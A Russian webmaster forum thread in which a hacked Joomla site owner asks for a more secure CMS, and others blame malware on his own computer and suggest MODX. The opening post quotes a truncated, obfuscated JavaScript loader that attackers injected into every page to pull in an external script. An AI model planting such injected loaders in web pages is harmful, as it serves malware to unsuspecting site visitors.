Помогите с выбором cms

ТимуриН
На сайте с 20.01.2009
34
505

Помогите пожалуйста выбрать достойную cms или может кто предложит еще варианты по решению моей проблемы. Проблема такова, имеется сайт (СДЛ) на joomla 1.5.14 с более-мение правильной версткой шаблона и так далее.. Но, хакеры меня уже достали в корень, с прописыванием разной хрени пример:

<html><body bgcolor="#FFFFFF"></body></html>
<script>/*GNU GPL*/ try{window.onload = function(){var Dlo228l8u771kzw = document.createElement('script');Dlo228l8u771kzw.setAttribute('type', 'text/javascript');Dlo228l8u771kzw.setAttribute('id', 'myscript1');Dlo228l8u771kzw.setAttribute('src', 'h@(t#t^^!p#
и так далее.....
на каждой странице и с размещением троянов. Я понимаю, что joomla - free cms и что нужно опредиляться с выбором платной, но опять же, зная, что правды о коммерческих cms практически нигде не прочитаешь, так как все что находит "гоша" это чистейшей воды популизм и скрытая реклама, вот и хотел спросить специалистов на незаангажированом портале!

Сайт состоит из форума на вобле, доски объявлений (джумловский модуль) и новости опять же по джумловски + небольшая навигация по сайту, вообщем небольшой сайт расчитан на относительно узкий круг людей. Пожелание к cms: безопасность, как можно меньше дыр и багов, через которые можно залезть и нашкодить, желательно руский интерфейс админки, любовь поисковиков к коду даного cms, ну и возможность найти исполнителя, который сможет помогать по данной cms, потому как поискав в интернете, есть вроде бы неплохие сms, а устанавливать и уж, тем более, верстать шаблон по ним могут всего лишь чуть ли не с десяток людей по всему СНГ.

Буду рад выслушать любые комментарии!

Никогда не бойся делать то, что ты пока не умеешь. Помни, что Ковчег был построен любителем. Профессионалы строили Титаник...
ewg777
На сайте с 04.06.2007
225
Но, хакеры меня уже достали в корень, с прописыванием разной хрени пример:

Свой компьютер нужно держать в тепле и в чистоте, тогда и вирусов на сайте не будет. CMS дела не поменяет.

Хороший обзор и этот

[Удален]

MODXCMS.COM

MODX.RU

seosniks
На сайте с 13.08.2007
389
ewg777:
Свой компьютер нужно держать в тепле и в чистоте, тогда и вирусов на сайте не будет. CMS дела не поменяет.
Хороший обзор и этот

+1. CMS не причем. ищите вирусы в компе и не храните пароли с программах

ТимуриН
На сайте с 20.01.2009
34
seosniks:
+1. CMS не причем. ищите вирусы в компе и не храните пароли с программах

пароли не имею привычки вообще хранить на каком либо носителе + куки и кеш у меня чистеца раз в сутки, а лезут на сайт через баги в самой cms я могу сказать со 90 % уверенностью в этом. p.s. стоит нормальная купленная лицензия нормального антивиря + лицензионный faervol

Кофейник
На сайте с 11.07.2009
78
ТимуриН:
а лезут на сайт через баги в самой cms я могу сказать со 90 %

Откройте секрет как проценты посчитали то?

ТимуриН:
p.s. стоит нормальная купленная лицензия нормального антивиря + лицензионный faervol

И это даёт вам уверенность в том, что система защищена от вирусов?

Кофейник добавил 25.12.2009 в 22:55

ТимуриН:
любовь поисковиков к коду даного cms

Как код системы влияет на ПС?

http://immater1um.livejournal.com/ (http://immater1um.livejournal.com/)
BrokenBrake
На сайте с 03.03.2007
194

/ru/forum/129625

Находится на виду в самом верху этого раздела.

Но темы про выбор CMS появляются и появляются...

ewg777
На сайте с 04.06.2007
225
стоит нормальная купленная лицензия нормального антивиря + лицензионный faervol

Тогда 100% вирусы у Вас. На Windows с правами не гостя не может не быть вирусов. Проверяйте через Dr. Web Live CD.

alexspb
На сайте с 14.11.2005
187
ТимуриН:
Сайт состоит из форума на вобле, ...

Если у вас вобла не ломанная, то у них уже есть и свой движок - докупите.

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий